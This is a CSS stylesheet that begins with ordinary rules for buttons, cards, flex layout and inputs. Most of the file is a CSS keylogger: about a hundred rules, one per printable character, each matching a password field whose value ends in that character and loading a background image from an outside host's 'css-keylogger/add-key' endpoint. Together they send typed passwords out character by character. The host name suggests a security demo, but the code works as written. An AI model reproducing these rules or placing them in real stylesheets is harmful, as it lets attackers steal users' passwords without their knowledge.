.btn-submit {
    min-width: 100px;
    background-color: #008CBA;
    color: white;
    border: 0;
    padding: 5px;
    border-radius: 3px;
}

.card {
    flex: 1;
    padding: 20px;
    margin: 20px;
    border-radius: 16px;
    box-shadow: 6px 6px 27px #e1e1e3, -6px -6px 27px #ffffff;
    border: 1px solid #e5e3e3;
    max-height: 250px;
    overflow: auto;
}

.d-flex {
    display: flex;
}

.flex-row {
    flex-direction: row;
}

.form-item {
    margin-bottom: 20px;
}

.title {
    font-size: 20px;
    font-weight: bold;
    border-bottom: 1px solid #ddd;
    padding-bottom: 10px;
    margin-bottom: 20px;
}

input {
    border-radius: 3px;
    border: 1px solid #ddd;
    min-width: 200px;
    padding: 5px;
}


input[type="password"][value$=" "] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=+"); }
input[type="password"][value$="!"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%21"); }
input[type="password"][value$="\""] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%22"); }
input[type="password"][value$="#"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%23"); }
input[type="password"][value$="$"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%24"); }
input[type="password"][value$="%"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%25"); }
input[type="password"][value$="&"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%26"); }
input[type="password"][value$="'"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%27"); }
input[type="password"][value$="("] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%28"); }
input[type="password"][value$=")"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%29"); }
input[type="password"][value$="*"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%2A"); }
input[type="password"][value$="+"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%2B"); }
input[type="password"][value$=","] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%2C"); }
input[type="password"][value$="-"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=-"); }
input[type="password"][value$="."] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=."); }
input[type="password"][value$="/"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%2F"); }
input[type="password"][value$="0"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=0"); }
input[type="password"][value$="1"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=1"); }
input[type="password"][value$="2"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=2"); }
input[type="password"][value$="3"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=3"); }
input[type="password"][value$="4"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=4"); }
input[type="password"][value$="5"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=5"); }
input[type="password"][value$="6"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=6"); }
input[type="password"][value$="7"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=7"); }
input[type="password"][value$="8"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=8"); }
input[type="password"][value$="9"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=9"); }
input[type="password"][value$=":"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%3A"); }
input[type="password"][value$=";"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%3B"); }
input[type="password"][value$="<"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%3C"); }
input[type="password"][value$="="] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%3D"); }
input[type="password"][value$=">"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%3E"); }
input[type="password"][value$="?"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%3F"); }
input[type="password"][value$="@"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%40"); }
input[type="password"][value$="A"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=A"); }
input[type="password"][value$="B"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=B"); }
input[type="password"][value$="C"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=C"); }
input[type="password"][value$="D"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=D"); }
input[type="password"][value$="E"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=E"); }
input[type="password"][value$="F"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=F"); }
input[type="password"][value$="G"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=G"); }
input[type="password"][value$="H"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=H"); }
input[type="password"][value$="I"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=I"); }
input[type="password"][value$="J"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=J"); }
input[type="password"][value$="K"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=K"); }
input[type="password"][value$="L"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=L"); }
input[type="password"][value$="M"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=M"); }
input[type="password"][value$="N"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=N"); }
input[type="password"][value$="O"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=O"); }
input[type="password"][value$="P"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=P"); }
input[type="password"][value$="Q"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=Q"); }
input[type="password"][value$="R"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=R"); }
input[type="password"][value$="S"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=S"); }
input[type="password"][value$="T"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=T"); }
input[type="password"][value$="U"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=U"); }
input[type="password"][value$="V"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=V"); }
input[type="password"][value$="W"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=W"); }
input[type="password"][value$="X"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=X"); }
input[type="password"][value$="Y"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=Y"); }
input[type="password"][value$="Z"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=Z"); }
input[type="password"][value$="["] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%5B"); }
input[type="password"][value$="\\"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%5C"); }
input[type="password"][value$="]"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%5D"); }
input[type="password"][value$="^"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%5E"); }
input[type="password"][value$="_"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=_"); }
input[type="password"][value$="`"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%60"); }
input[type="password"][value$="a"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=a"); }
input[type="password"][value$="b"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=b"); }
input[type="password"][value$="c"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=c"); }
input[type="password"][value$="d"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=d"); }
input[type="password"][value$="e"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=e"); }
input[type="password"][value$="f"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=f"); }
input[type="password"][value$="g"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=g"); }
input[type="password"][value$="h"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=h"); }
input[type="password"][value$="i"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=i"); }
input[type="password"][value$="j"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=j"); }
input[type="password"][value$="k"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=k"); }
input[type="password"][value$="l"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=l"); }
input[type="password"][value$="m"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=m"); }
input[type="password"][value$="n"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=n"); }
input[type="password"][value$="o"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=o"); }
input[type="password"][value$="p"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=p"); }
input[type="password"][value$="q"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=q"); }
input[type="password"][value$="r"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=r"); }
input[type="password"][value$="s"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=s"); }
input[type="password"][value$="t"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=t"); }
input[type="password"][value$="u"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=u"); }
input[type="password"][value$="v"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=v"); }
input[type="password"][value$="w"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=w"); }
input[type="password"][value$="x"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=x"); }
input[type="password"][value$="y"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=y"); }
input[type="password"][value$="z"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=z"); }
input[type="password"][value$="{"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%7B"); }
input[type="password"][value$="|"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%7C"); }
input[type="password"][value$="\\}"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%7D"); }
input[type="password"][value$="~"] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=~"); }
input[type="password"][value$=""] { background-image: url("https://security-check-playground.herokuapp.com/css-keylogger/add-key?val=%7F"); }